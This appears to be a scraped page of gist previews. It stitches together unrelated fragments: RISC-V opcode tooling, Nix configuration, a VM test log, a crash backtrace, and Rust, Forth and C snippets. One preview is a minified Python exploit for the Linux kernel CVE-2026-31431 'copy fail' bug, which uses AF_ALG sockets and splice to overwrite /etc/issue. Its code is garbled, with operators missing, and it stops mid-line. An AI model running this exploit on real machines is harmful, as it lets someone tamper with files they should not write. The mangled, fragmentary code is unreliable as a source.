dram dramforever

If you really want to use this janky code:

$ git clone https://github.com/riscv/riscv-opcodes
$ ./parse.py 'rv_*' 'rv64_*'
$ python3 free-space.py

	#!/usr/bin/env python3

	# Based on https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
	# Changed to write to /etc/issue instead of dropping a binary to allow it to do something visible on a non-x86_64 machine.

	import os as g,zlib,socket as s
	def d(x):return bytes.fromhex(x)
	def c(f,t,c):
	a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
	try:u.recv(8+t)

	{
	config,
	lib,
	pkgs,
	...
	}:

	let
	cfg = config.boot.initrd.systemd;
	in

	#! /usr/bin/env bash
	set -x -e -o pipefail

	# PoC of nixos-substrate
	#
	# substrate n.
	# portmanteau of "subdir" and "lustrate"
	# (also a real word that means something relevant, probably)
	#
	# fanfiction of nixos-bite https://gist.github.com/whitequark/b2ebce6ce77f4b29e37dffc4cbd45873

	#ifndef __VMLINUX_H__
	#define __VMLINUX_H__

	#ifndef BPF_NO_PRESERVE_ACCESS_INDEX
	#pragma clang attribute push (__attribute__((preserve_access_index)), apply_to = record)
	#endif

	/* 16-bit */
	typedef short unsigned int __u16;
	typedef __u16 __be16;

	Machine state will be reset. To keep it, pass --keep-vm-state
	[1m[32mstart all VLans[0m
	start vlan
	running vlan (pid 9; ctl /build/vde1.ctl)
	(finished: start all VLans, in 0.00 seconds)
	Test will time out and terminate in 3600 seconds
	[1m[32mrun the VM test script[0m
	additionally exposed symbols:
	fakeip, server, target, tproxy, tun, wireguard,
	vlan1,

	#0 0x00007fb858e9cf3c in __pthread_kill_implementation () from /nix/store/g2jzxk3s7cnkhh8yq55l4fbvf639zy37-glibc-2.40-66/lib/libc.so.6
	#1 0x00007fb858e4190e in raise () from /nix/store/g2jzxk3s7cnkhh8yq55l4fbvf639zy37-glibc-2.40-66/lib/libc.so.6
	#2 0x00007fb85d6366f3 in KCrash::defaultCrashHandler(int) () from /nix/store/4knd9p4dr453bwb44g4glknskilg208j-kcrash-6.16.0/lib/libKF6Crash.so.6
	#3 <signal handler called>
	#4 0x00007fb83e076950 in iris_set_damage_region () from /nix/store/ig8h5hjy3s9lfhi75zc64acmyzr8zzyd-mesa-25.1.6/lib/libgallium-25.1.6.so
	#5 0x00007fb83cd27fcf in dri_st_framebuffer_validate () from /nix/store/ig8h5hjy3s9lfhi75zc64acmyzr8zzyd-mesa-25.1.6/lib/libgallium-25.1.6.so
	#6 0x00007fb83cddc48c in st_framebuffer_validate () from /nix/store/ig8h5hjy3s9lfhi75zc64acmyzr8zzyd-mesa-25.1.6/lib/libgallium-25.1.6.so
	#7 0x00007fb83cddd061 in st_api_make_current () from /nix/store/ig8h5hjy3s9lfhi75zc64acmyzr8zzyd-mesa-25.1.6/lib/libgallium-25.1.6.so
	#8 0x00007fb83cd27a84 in dri_make_current () f

	use core::{
	fmt,
	ops::{Range, RangeInclusive},
	};

	/// A non-empty range of `usize` values
	///
	/// Like [`RangeInclusive`], `Region` can repesent any `usize` range, even those
	/// that contain `usize::MAX`.
	#[derive(Clone, Copy, PartialEq, Eq)]

	\ https://www.cs.utexas.edu/users/EWD/transcriptions/EWD00xx/EWD28.html

	: indvar create 0 , ['] @ ,
	does> dup cell+ @ execute ;

	: :=
	>body
	dup -rot ! \ Store value
	cell+ ['] @ swap ! ; \ Make literal indvar

	#include <stdio.h>
	#include <stdlib.h>

	#define DECL_STATE \
	[[maybe_unused]] const struct word const ip, \
	[[maybe_unused]] size_t *sp, \
	[[maybe_unused]] const struct word const *rsp
	#define STATE ip, sp, rsp

	struct word {